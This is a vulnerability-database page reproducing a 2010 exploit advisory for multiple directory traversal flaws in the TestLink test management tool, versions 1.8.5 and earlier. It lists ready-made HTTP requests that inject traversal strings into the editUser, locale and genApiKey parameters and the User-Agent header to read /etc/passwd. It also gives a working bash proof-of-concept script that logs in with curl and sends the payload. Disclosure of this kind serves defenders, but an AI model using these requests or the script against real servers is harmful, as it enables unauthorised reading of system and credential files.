Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Multiple directory Traversal Vulnerabilites in Testlink TestManagement

🗓️ 18 Jan 2010 00:00:00Reported by Prashant KhandelwalType 
zdt
 zdt🔗 0day.today👁 19 Views

Multiple directory Traversal Vulnerabilites in Testlink TestManagement and Execution System. Discovered by Prashant Khandelwal on Jan-15-2010. Vulnerable to all versions <= 1.8.5 and can be exploited with an authenticated session

Code
===========================================================================================
Multiple directory Traversal Vulnerabilites in Testlink TestManagement and Execution System
===========================================================================================

1.Title :Multiple directory Traversal Vulnerabilites in Testlink TestManagement and Execution System.
  Discovered by: Prashant Khandelwal 
  Submitted :Jan-15-2010

2.Vulnerability Information
 
  Class: Directory Traversal
  Remotely Exploitable: Yes
  Locally Exploitable: No
 
 
3.Vulnerable packages.
 
Versions affected :All versions <= Testlink 1.8.5
Download : http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc
 
 
4.Vulnerability Description
 
Multiple directory traversal vulnerabilities has been found in Testlink(http://www.teamst.org/) a popular and acclaimed free, open source Test management tool written in PHP.
The issue discovered can only be exploited with an authenticated session.This directory traversal vulnerability is present in the file /testlink/lib/usermanagement/
userInfo.php  & In testlink 1.8.4 these issues can be exploited by setting the variable "editUser"& "locale" like below with a HTTP POST request
 
Example HTTP header for 1.8.5
 
-----------------------------------------------------------------------------------------------------------------------------------
a)Directory Traversal :The POST variable editUser has been set to ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
------------------------------------------------------------------------------------------------------------------------------------
Request
 
POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
id=1&firstName=Testlink&lastName=Administrator&emailAddress=111-222-1933email%40address%2Etst&locale=cs_CZ&editUser=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwdResponse
 
 
-----------------------------------------------------------------------------------------------------------------------------------
b)Directory Traversal :The POST variable locale has been set to ../../../../../../../../etc/passwd%00.html
------------------------------------------------------------------------------------------------------------------------------------
Request
 
POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
id=1&firstName=Testlink&lastName=Administrator&emailAddress=111-222-1933email%40address%2Etst&locale=../../../../../../../../etc/passwd%00.html&editUser=GuardarResponse
 
 
In testlink 1.8.4 these issues can be exploited by setting the variable "genApiKey"& "locale" like below with a HTTP POST request.
 
Exploit for 1.8.4
 
-----------------------------------------------------------------------------------------------------------
a)Directory traverasa : The POST variable locale has been set to ../../../../../../../../etc/passwd%00.html.
-----------------------------------------------------------------------------------------------------------
Request
 
POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
id=1&firstName=Testlink&lastName=Administrator&[email protected]&locale=../../../../../../../../etc/passwd%00.html&editUser=SaveResponse
 
 
-----------------------------------------------------------------------------------------------------------------------------------
b)Directory Traversal : The POST variable genApiKey has been set to ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
------------------------------------------------------------------------------------------------------------------------------------
Request
 
POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
id=1&genApiKey=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
 
 
One of the issues in Testlink 1.8.4 can be exploited by directory traversing with the HTTP User-Agent header like below.
 
-----------------------------------------------------------------------------------------------------------------------------------
c)Directory Traversal :The HTTP header user-agent has been set to ../../../../../../../../etc/passwd .htm.
------------------------------------------------------------------------------------------------------------------------------------
 
Request
 
GET /testlink/lib/usermanagement/userInfo.php HTTP/1.0
Accept: */*
User-Agent: ../../../../../../../../etc/passwd .htm
Host: 10.209.84.1
Cookie: PHPSESSID=ad966ffbe53232c258f231404cef4552;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cacheResponse
 
 
5.Proof of Concept
 
The below POC has been tested with testlink 1.8.5
===============================================================================================================================================================
#!/usr/bin/env bash
# Prashant Khandelwal 
# Remote Directory Traversal in Testlink the Test Management Tool
# Vendor : Testlink http://www.teamst.org<http://www.teamst.org/>
# Affected Version : <=1.8.5  (http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc)
# Vulnerability Discovered: 5-Jan-2010
# This POC is for Educational purpose
 
if [ $# -ne 4 ]
then
 
    echo "Usage   - ./$0  User password  Testlink_root_dir_URI  Directory_traversal_string"
    echo "Example - ./$0  admin admin http://Testlink-Server/testlink<http://testlink-server/testlink> ../../../../../../../../etc/passwd%00.html"
    exit 1
fi
rm -rf cookies output.txt
curl -d "tl_login=$1&tl_password=$2" $3/login.php -c cookies
curl -d "id=1&firstName=Directorytraversal&lastName=Exploit&emailAddress=111-222-1933email%40address%2Etst&locale=$4&editUser=admin" $3/lib/usermanagement/userInfo.php -b cookies -v | more >output.txt
head -n 80  output.txt
 
===============================================================================================================================================================



#  0day.today [2018-01-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Jan 2010 00:00Current
7.1High risk
Vulners AI Score7.1
directory traversaltestlinksecurity vulnerabilityphphttp postauthenticated sessionvulnerable package
19